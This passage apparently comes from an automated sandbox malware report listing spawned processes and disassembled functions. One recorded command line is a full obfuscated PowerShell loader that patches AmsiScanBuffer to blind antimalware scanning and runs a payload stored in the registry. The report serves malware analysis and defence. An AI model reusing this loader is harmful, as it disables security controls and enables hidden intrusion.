MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	28
Start time:	08:54:59
Start date:	03/10/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell.exe -WindowStyle Hidden
Imagebase:	0x7ff6cb6b0000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Analysis Process: WerFault.exePID: 4300, Parent PID: 7080

General

Target ID:	30
Start time:	08:55:05
Start date:	03/10/2024
Path:	C:\Windows\System32\WerFault.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\WerFault.exe -u -p 7080 -s 2400
Imagebase:	0x7ff68ec70000
File size:	570'736 bytes
MD5 hash:	FD27D9F6D02763BDE32511B5DF7FF7A0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	32
Start time:	08:55:10
Start date:	03/10/2024
Path:	C:\Windows\System32\WerFault.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\WerFault.exe -u -p 7080 -s 2172
Imagebase:	0x7ff68ec70000
File size:	570'736 bytes
MD5 hash:	FD27D9F6D02763BDE32511B5DF7FF7A0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	33
Start time:	08:55:14
Start date:	03/10/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F
Imagebase:	0x7ff7036c0000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	34
Start time:	08:55:14
Start date:	03/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	35
Start time:	08:55:18
Start date:	03/10/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
Imagebase:	0x510000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	36
Start time:	08:55:18
Start date:	03/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	37
Start time:	08:55:18
Start date:	03/10/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
Imagebase:	0x510000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	38
Start time:	08:55:19
Start date:	03/10/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:aYWZgkdITfai{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$fJPxTSrGmUkcyL,[Parameter(Position=1)][Type]$DKfBMaOKCb)$QUflgQKJgBw=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+'f'+''+[Char](108)+''+[Char](101)+'c'+[Char](116)+''+'e'+''+[Char](100)+''+'D'+''+[Char](101)+''+[Char](108)+''+[Char](101)+''+[Char](103)+'ate')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+[Char](110)+''+'M'+''+[Char](101)+''+'m'+'o'+[Char](114)+''+[Char](121)+''+[Char](77)+''+'o'+''+[Char](100)+''+[Char](117)+'l'+'e'+'',$False).DefineType('M'+[Char](121)+'De'+[Char](108)+'eg'+'a'+''+[Char](116)+''+[Char](101)+''+[Char](84)+''+'y'+''+[Char](112)+''+[Char](101)+'',''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+'s'+''+[Char](44)+''+[Char](80)+'ub'+[Char](108)+''+'i'+''+[Char](99)+''+','+''+'S'+''+'e'+'a'+[Char](108)+'e'+[Char](100)+''+','+''+[Char](65)+''+[Char](110)+''+[Char](115)+'i'+'C'+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+'s'+','+[Char](65)+''+[Char](117)+''+[Char](116)+''+[Char](111)+''+'C'+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$QUflgQKJgBw.DefineConstructor(''+[Char](82)+'T'+'S'+''+[Char](112)+''+'e'+''+[Char](99)+''+[Char](105)+''+[Char](97)+''+'l'+''+[Char](78)+''+[Char](97)+''+'m'+''+[Char](101)+','+'H'+''+'i'+''+'d'+''+[Char](101)+''+'B'+''+[Char](121)+''+[Char](83)+''+[Char](105)+''+[Char](103)+''+[Char](44)+''+'P'+'u'+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$fJPxTSrGmUkcyL).SetImplementationFlags(''+'R'+'u'+'n'+''+'t'+''+[Char](105)+''+'m'+''+[Char](101)+''+','+''+[Char](77)+''+[Char](97)+''+[Char](110)+''+[Char](97)+'g'+[Char](101)+''+[Char](100)+'');$QUflgQKJgBw.DefineMethod(''+[Char](73)+''+[Char](110)+''+[Char](118)+''+'o'+''+[Char](107)+''+[Char](101)+'','P'+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+'c'+[Char](44)+''+[Char](72)+'i'+[Char](100)+''+[Char](101)+''+'B'+''+[Char](121)+''+[Char](83)+'i'+[Char](103)+''+[Char](44)+'N'+[Char](101)+''+'w'+'S'+[Char](108)+''+[Char](111)+''+'t'+''+[Char](44)+'V'+[Char](105)+''+'r'+''+[Char](116)+''+[Char](117)+'a'+[Char](108)+'',$DKfBMaOKCb,$fJPxTSrGmUkcyL).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+[Char](116)+''+'i'+'m'+[Char](101)+''+','+''+'M'+''+[Char](97)+''+'n'+''+'a'+'g'+[Char](101)+'d');Write-Output $QUflgQKJgBw.CreateType();}$WRnqVVFrVLSrh=([AppDomain]::CurrentDomain.GetAssemblies()\|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('S'+[Char](121)+''+[Char](115)+'tem'+[Char](46)+''+[Char](100)+''+[Char](108)+'l')}).GetType(''+'M'+''+[Char](105)+''+'c'+''+[Char](114)+''+[Char](111)+''+'s'+''+'o'+''+[Char](102)+''+[Char](116)+''+'.'+'W'+'i'+''+[Char](110)+''+[Char](51)+''+[Char](50)+''+'.'+''+'U'+'ns'+[Char](97)+''+[Char](102)+''+[Char](101)+''+[Char](78)+'at'+[Char](105)+''+[Char](118)+''+[Char](101)+'Me'+'t'+''+[Char](104)+''+[Char](111)+''+'d'+''+[Char](115)+'');$YLRtgUHBybAeSz=$WRnqVVFrVLSrh.GetMethod(''+'G'+''+'e'+'t'+[Char](80)+''+[Char](114)+''+[Char](111)+''+[Char](99)+'A'+[Char](100)+''+[Char](100)+''+[Char](114)+''+[Char](101)+''+[Char](115)+''+'s'+'',[Reflection.BindingFlags]('Pu'+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+','+[Char](83)+''+[Char](116)+'a'+'t'+''+[Char](105)+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$PEmsRMlCSlPDgPcGUWk=aYWZgkdITfai @([String])([IntPtr]);$okFleUAeyDuwZAfHWQFfNP=aYWZgkdITfai @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$aBWxSgKrnUs=$WRnqVVFrVLSrh.GetMethod(''+[Char](71)+''+[Char](101)+'t'+'M'+''+[Char](111)+''+[Char](100)+''+[Char](117)+''+[Char](108)+''+'e'+''+'H'+''+'a'+''+[Char](110)+''+'d'+''+[Char](108)+''+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+'r'+[Char](110)+''+[Char](101)+''+'l'+''+'3'+''+[Char](50)+''+'.'+''+[Char](100)+''+[Char](108)+''+'l'+'')));$WzFkwARTzpFLOf=$YLRtgUHBybAeSz.Invoke($Null,@([Object]$aBWxSgKrnUs,[Object](''+'L'+''+[Char](111)+''+[Char](97)+''+[Char](100)+''+[Char](76)+''+'i'+'bra'+[Char](114)+'yA')));$qdgplTDpiNjVfetqy=$YLRtgUHBybAeSz.Invoke($Null,@([Object]$aBWxSgKrnUs,[Object](''+[Char](86)+'i'+[Char](114)+''+[Char](116)+''+[Char](117)+'a'+[Char](108)+''+[Char](80)+''+[Char](114)+''+'o'+''+[Char](116)+'e'+[Char](99)+''+'t'+'')));$WxFISlG=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($WzFkwARTzpFLOf,$PEmsRMlCSlPDgPcGUWk).Invoke('a'+'m'+'s'+[Char](105)+''+[Char](46)+''+[Char](100)+'l'+[Char](108)+'');$BtHEHTUmMhFSXEmPh=$YLRtgUHBybAeSz.Invoke($Null,@([Object]$WxFISlG,[Object](''+[Char](65)+''+[Char](109)+''+[Char](115)+''+'i'+''+[Char](83)+''+'c'+''+[Char](97)+'n'+[Char](66)+''+[Char](117)+''+[Char](102)+''+[Char](102)+''+'e'+''+[Char](114)+'')));$xiihgyajRQ=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($qdgplTDpiNjVfetqy,$okFleUAeyDuwZAfHWQFfNP).Invoke($BtHEHTUmMhFSXEmPh,[uint32]8,4,[ref]$xiihgyajRQ);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$BtHEHTUmMhFSXEmPh,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($qdgplTDpiNjVfetqy,$okFleUAeyDuwZAfHWQFfNP).Invoke($BtHEHTUmMhFSXEmPh,[uint32]8,0x20,[ref]$xiihgyajRQ);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+'OF'+[Char](84)+''+[Char](87)+''+'A'+''+[Char](82)+''+[Char](69)+'').GetValue('$'+[Char](114)+''+[Char](98)+'x-s'+'t'+'a'+[Char](103)+''+[Char](101)+'r')).EntryPoint.Invoke($Null,$Null)"
Imagebase:	0x7ff6cb6b0000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	39
Start time:	08:55:19
Start date:	03/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	40
Start time:	08:55:21
Start date:	03/10/2024
Path:	C:\Windows\System32\dllhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\dllhost.exe /Processid:{efb95082-f278-4e03-9e3f-6389e31f9866}
Imagebase:	0x7ff673080000
File size:	21'312 bytes
MD5 hash:	08EB78E5BE019DF044C26B14703BD1FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	41
Start time:	08:55:21
Start date:	03/10/2024
Path:	C:\Windows\System32\winlogon.exe
Wow64 process (32bit):	false
Commandline:	winlogon.exe
Imagebase:	0x7ff6cc5a0000
File size:	906'240 bytes
MD5 hash:	F8B41A1B3E569E7E6F990567F21DCE97
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	42
Start time:	08:55:22
Start date:	03/10/2024
Path:	C:\Windows\System32\lsass.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\lsass.exe
Imagebase:	0x7ff6b5fa0000
File size:	59'456 bytes
MD5 hash:	A1CC00332BBF370654EE3DC8CDC8C95A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	43
Start time:	08:55:23
Start date:	03/10/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
Imagebase:	0x7ff67e6d0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	44
Start time:	08:55:23
Start date:	03/10/2024
Path:	C:\Windows\System32\dwm.exe
Wow64 process (32bit):	false
Commandline:	"dwm.exe"
Imagebase:	0x7ff7751a0000
File size:	94'720 bytes
MD5 hash:	5C27608411832C5B39BA04E33D53536C
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	45
Start time:	08:55:24
Start date:	03/10/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
Imagebase:	0x7ff67e6d0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	46
Start time:	08:55:24
Start date:	03/10/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
Imagebase:	0x7ff67e6d0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	47
Start time:	08:55:25
Start date:	03/10/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
Imagebase:	0x7ff67e6d0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	48
Start time:	08:55:25
Start date:	03/10/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
Imagebase:	0x7ff67e6d0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	49
Start time:	08:55:26
Start date:	03/10/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
Imagebase:	0x7ff67e6d0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	50
Start time:	08:55:27
Start date:	03/10/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
Imagebase:	0x7ff67e6d0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	51
Start time:	08:55:28
Start date:	03/10/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
Imagebase:	0x7ff67e6d0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	52
Start time:	08:55:28
Start date:	03/10/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
Imagebase:	0x7ff67e6d0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	53
Start time:	08:55:29
Start date:	03/10/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
Imagebase:	0x7ff67e6d0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	54
Start time:	08:55:30
Start date:	03/10/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
Imagebase:	0x7ff67e6d0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	55
Start time:	08:55:31
Start date:	03/10/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
Imagebase:	0x7ff67e6d0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	56
Start time:	08:55:31
Start date:	03/10/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
Imagebase:	0x7ff67e6d0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	57
Start time:	08:55:32
Start date:	03/10/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
Imagebase:	0x7ff67e6d0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	58
Start time:	08:55:32
Start date:	03/10/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
Imagebase:	0x7ff67e6d0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	622
Start time:	08:55:42
Start date:	03/10/2024
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	645
Start time:	08:55:51
Start date:	03/10/2024
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	1.5%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	9%
Total number of Nodes:	1393
Total number of Limit Nodes:	7

Executed Functions

Function 000001B444901E3C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 13
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE ref: 000001B444901E47
GetProcAddress.KERNEL32 ref: 000001B444901E57
SleepEx.KERNELBASE ref: 000001B444901E67

Strings

amsi.dll, xrefs: 000001B444901E40
AmsiScanBuffer, xrefs: 000001B444901E50

Memory Dump Source

Source File: 00000014.00000002.2698386924.000001B444901000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001B444900000, based on PE: true

Associated: 00000014.00000002.2697591081.000001B444900000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2699355227.000001B444915000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2700149262.000001B444920000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2701235647.000001B444922000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2702574663.000001B444929000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_1b444900000_conhost.jbxd

Similarity

API ID: AddressLibraryLoadProcSleep
String ID: AmsiScanBuffer$amsi.dll
API String ID: 188063004-3248079830
Opcode ID: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
Instruction ID: cc1092c618083c93708768dc689d5ce69951447389d3c8ede5c818316b15fcd5
Opcode Fuzzy Hash: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
Instruction Fuzzy Hash: 3CD06730A12640D7FA496F71E8D57D83271AB64F53FC58415C50E022A2DF2D8979A340

Function 000001B444901E74 Relevance: 43.8, APIs: 8, Strings: 17, Instructions: 95
memorythreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentThread.KERNEL32 ref: 000001B444901E7F

Part of subcall function 000001B4449022A8: GetModuleHandleA.KERNEL32(?,?,?,000001B444901EB1), ref: 000001B4449022C0
Part of subcall function 000001B4449022A8: GetProcAddress.KERNEL32(?,?,?,000001B444901EB1), ref: 000001B4449022D1

CreateThread.KERNELBASE ref: 000001B444902043
TlsAlloc.KERNEL32 ref: 000001B444902049
TlsAlloc.KERNEL32 ref: 000001B444902055
TlsAlloc.KERNEL32 ref: 000001B444902061
TlsAlloc.KERNEL32 ref: 000001B44490206D
TlsAlloc.KERNEL32 ref: 000001B444902079
TlsAlloc.KERNEL32 ref: 000001B444902085

Strings

NtDeviceIoControlFile, xrefs: 000001B444901FB6
NtQueryDirectoryFile, xrefs: 000001B444901EDF
ntdll.dll, xrefs: 000001B444901E8D
NtEnumerateKey, xrefs: 000001B444901F19
AmsiScanBuffer, xrefs: 000001B444902012
PdhGetRawCounterArrayW, xrefs: 000001B444901FD0
EnumServicesStatusExW, xrefs: 000001B444901F71, 000001B444901F92
NtQuerySystemInformation, xrefs: 000001B444901EA5
PdhGetFormattedCounterArrayW, xrefs: 000001B444901FF1
advapi32.dll, xrefs: 000001B444901F57, 000001B444901F78
EnumServiceGroupW, xrefs: 000001B444901F50
sechost.dll, xrefs: 000001B444901F99
NtQueryDirectoryFileEx, xrefs: 000001B444901EFC
pdh.dll, xrefs: 000001B444901FD7, 000001B444901FF8
amsi.dll, xrefs: 000001B444902019
NtResumeThread, xrefs: 000001B444901EC2
NtEnumerateValueKey, xrefs: 000001B444901F36

Memory Dump Source

Source File: 00000014.00000002.2698386924.000001B444901000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001B444900000, based on PE: true

Associated: 00000014.00000002.2697591081.000001B444900000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2699355227.000001B444915000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2700149262.000001B444920000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2701235647.000001B444922000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2702574663.000001B444929000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_1b444900000_conhost.jbxd

Similarity

API ID: Alloc$Thread$AddressCreateCurrentHandleModuleProc
String ID: AmsiScanBuffer$EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$PdhGetFormattedCounterArrayW$PdhGetRawCounterArrayW$advapi32.dll$amsi.dll$ntdll.dll$pdh.dll$sechost.dll
API String ID: 1735320900-4225371247
Opcode ID: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
Instruction ID: 463b54c64855c35cda9f5badf29bf51cd3b3585f437fe171f7aa81b0ed911ff7
Opcode Fuzzy Hash: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
Instruction Fuzzy Hash: 83516A78514A4AA7FB09EFB8E8C67D4B331B744756F80C923940906567DF388A7AE380

Function 000001B444903A1C Relevance: 4.5, APIs: 3, Instructions: 39
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameW.KERNEL32 ref: 000001B444903A35
PathFindFileNameW.SHLWAPI ref: 000001B444903A44

Part of subcall function 000001B444903F88: StrCmpNIW.SHLWAPI(?,?,?,000001B44490272F), ref: 000001B444903FA0

Part of subcall function 000001B444903EC8: GetModuleHandleW.KERNEL32(?,?,?,?,?,000001B444903A5B), ref: 000001B444903EDB
Part of subcall function 000001B444903EC8: GetCurrentProcess.KERNEL32(?,?,?,?,?,000001B444903A5B), ref: 000001B444903F0E
Part of subcall function 000001B444903EC8: VirtualProtectEx.KERNEL32(?,?,?,?,?,000001B444903A5B), ref: 000001B444903F2E
Part of subcall function 000001B444903EC8: GetCurrentProcess.KERNEL32(?,?,?,?,?,000001B444903A5B), ref: 000001B444903F47
Part of subcall function 000001B444903EC8: VirtualProtectEx.KERNEL32(?,?,?,?,?,000001B444903A5B), ref: 000001B444903F68

CreateThread.KERNELBASE ref: 000001B444903A8B

Part of subcall function 000001B444901E74: GetCurrentThread.KERNEL32 ref: 000001B444901E7F
Part of subcall function 000001B444901E74: CreateThread.KERNELBASE ref: 000001B444902043
Part of subcall function 000001B444901E74: TlsAlloc.KERNEL32 ref: 000001B444902049
Part of subcall function 000001B444901E74: TlsAlloc.KERNEL32 ref: 000001B444902055
Part of subcall function 000001B444901E74: TlsAlloc.KERNEL32 ref: 000001B444902061
Part of subcall function 000001B444901E74: TlsAlloc.KERNEL32 ref: 000001B44490206D
Part of subcall function 000001B444901E74: TlsAlloc.KERNEL32 ref: 000001B444902079
Part of subcall function 000001B444901E74: TlsAlloc.KERNEL32 ref: 000001B444902085

Memory Dump Source

Source File: 00000014.00000002.2698386924.000001B444901000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001B444900000, based on PE: true

Associated: 00000014.00000002.2697591081.000001B444900000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2699355227.000001B444915000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2700149262.000001B444920000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2701235647.000001B444922000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2702574663.000001B444929000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_1b444900000_conhost.jbxd

Similarity

API ID: Alloc$CurrentThread$CreateFileModuleNameProcessProtectVirtual$FindHandlePath
String ID:
API String ID: 2779030803-0
Opcode ID: 6a579ca0c7c2c8c467e4d6158b23fada6777a03145598802ad2919fe2a24b2e1
Instruction ID: 4354f403c46ac883cb633c1936d3708a9b2e12e53e6e58379288aa84facc5a44
Opcode Fuzzy Hash: 6a579ca0c7c2c8c467e4d6158b23fada6777a03145598802ad2919fe2a24b2e1
